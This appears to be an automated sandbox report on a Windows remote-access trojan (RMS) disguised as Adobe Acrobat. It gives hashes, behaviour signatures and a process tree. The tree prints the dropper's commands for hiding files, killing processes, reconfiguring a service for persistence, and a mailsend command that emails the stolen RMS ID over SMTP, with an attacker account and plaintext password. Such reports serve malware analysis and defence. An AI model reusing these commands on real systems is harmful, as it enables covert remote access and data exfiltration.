Overview

overview

10

Static

static

7adfb53ec0...in.exe

windows7_x64

10

7adfb53ec0...in.exe

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    25/02/2021, 00:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe

  • Size

    5.0MB

  • MD5

    24cae17860a840c0317018ef3d607e94

  • SHA1

    7595283fd24ebae9f95ea80209d674ca9bd2afcc

  • SHA256

    7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c

  • SHA512

    bdfe1b899ef55a0ae793e672c190d79161899179d98b0577b5ceda8f02c66376ca0d366c0f087dbb043d30c7ec41a39b0cd2fcc6be4d66639777c6430db3ee82

Score
10/10
rmsdiscoveryevasionrattrojan

Malware Config

Signatures

  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

    trojanratrms
  • Executes dropped EXE 8 IoCs
  • Sets file to hidden 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Stops running service(s) 3 TTPs
    evasion
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops file in Program Files directory 27 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Kills process with taskkill 4 IoCs
    evasion
  • Runs .reg file with regedit 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 8 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe"
    1⤵
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:4712
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files\Adobe\AdobeAcrobat\install.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3600
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +h "C:\Program Files\Adobe\AdobeAcrobat"
        3⤵
        • Drops file in Program Files directory
        • Views/modifies file attributes
        PID:2800
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +h "C:\Program Files\Adobe\AdobeAcrobat\*.*"
        3⤵
        • Drops file in Program Files directory
        • Views/modifies file attributes
        PID:748
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +h "C:\Program Files\Adobe\AdobeAcrobat\Logs"
        3⤵
        • Views/modifies file attributes
        PID:3188
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +h "C:\Program Files\Adobe\AdobeAcrobat\Logs\*.*"
        3⤵
        • Views/modifies file attributes
        PID:3828
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im rfusclient.exe /f
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3912
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im rutserv.exe /f
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4076
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im Acrobat-XI.exe /f
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4068
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im AdobeFP.exe /f
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3816
      • C:\Windows\SysWOW64\sc.exe
        sc delete AdobeReader
        3⤵
          PID:3324
        • C:\Windows\SysWOW64\reg.exe
          reg delete "HKLM\SYSTEM\Hardware Driver\LocalDisk" /f
          3⤵
            PID:4444
          • C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe
            "C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe" /silentinstall
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:4432
          • C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe
            "C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe" /firewall
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            PID:4516
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "C:\Program Files\Adobe\AdobeAcrobat\regedit.reg"
            3⤵
            • Runs .reg file with regedit
            PID:4508
          • C:\Windows\SysWOW64\sc.exe
            sc failure AdobeReader reset= 0 actions= restart/1000/restart/1000/restart/1000
            3⤵
              PID:4528
            • C:\Windows\SysWOW64\sc.exe
              sc config AdobeReader obj= LocalSystem type= interact type= own
              3⤵
                PID:512
              • C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe
                "C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe" /start
                3⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:656
              • C:\Windows\SysWOW64\timeout.exe
                timeout 10
                3⤵
                • Delays execution with timeout.exe
                PID:1540
              • C:\Windows\SysWOW64\reg.exe
                reg export "HKLM\SYSTEM\Hardware Driver\LocalDisk\v4\Server\Parameters" "IT.txt"
                3⤵
                • Drops file in Program Files directory
                PID:4256
              • C:\Windows\SysWOW64\timeout.exe
                timeout 10
                3⤵
                • Delays execution with timeout.exe
                PID:196
              • C:\Program Files\Adobe\AdobeAcrobat\mailsend.exe
                mailsend.exe -t [email protected] -attach IT.txt,application/txt -sub "RMS ID" -smtp smtp.mail.ru -port 465 -f [email protected] -name "RMS ToktonIT" -ssl -auth-login -user [email protected] -pass hT*euyAyCT43 -q
                3⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:4348
              • C:\Windows\SysWOW64\attrib.exe
                attrib "regedit.reg" -S -H /S /D
                3⤵
                • Drops file in Program Files directory
                • Views/modifies file attributes
                PID:4184
              • C:\Windows\SysWOW64\attrib.exe
                attrib "install.bat" -S -H /S /D
                3⤵
                • Drops file in Program Files directory
                • Views/modifies file attributes
                PID:692
              • C:\Windows\SysWOW64\attrib.exe
                attrib "IT.txt" -S -H /S /D
                3⤵
                • Drops file in Program Files directory
                • Views/modifies file attributes
                PID:2668
              • C:\Windows\SysWOW64\attrib.exe
                attrib "mailsend.exe" -S -H /S /D
                3⤵
                • Drops file in Program Files directory
                • Views/modifies file attributes
                PID:4180
          • C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe
            "C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"
            1⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:808
            • C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe
              "C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe" /tray
              2⤵
              • Executes dropped EXE
              PID:1120
            • C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe
              "C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1116
              • C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe
                "C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe" /tray
                3⤵
                • Executes dropped EXE
                • Suspicious behavior: SetClipboardViewer
                PID:4684

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/656-39-0x0000000000B30000-0x0000000000B31000-memory.dmp

            Filesize

            4KB

            Download

          • memory/808-40-0x00000000001E0000-0x00000000001E1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1116-48-0x00000000025C0000-0x00000000025C1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1116-47-0x0000000003540000-0x0000000003541000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1116-46-0x0000000002D40000-0x0000000002D41000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1120-49-0x0000000000B20000-0x0000000000B21000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4348-60-0x00000000033F0000-0x00000000033F1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4348-58-0x00000000033F0000-0x00000000033F1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4348-59-0x0000000003BF0000-0x0000000003BF1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4432-27-0x0000000002F10000-0x0000000002F11000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4432-26-0x0000000003710000-0x0000000003711000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4432-25-0x0000000002F10000-0x0000000002F11000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4432-31-0x0000000000C90000-0x0000000000C91000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4516-32-0x0000000000D10000-0x0000000000D11000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4684-52-0x0000000000B30000-0x0000000000B31000-memory.dmp

            Filesize

            4KB

            Download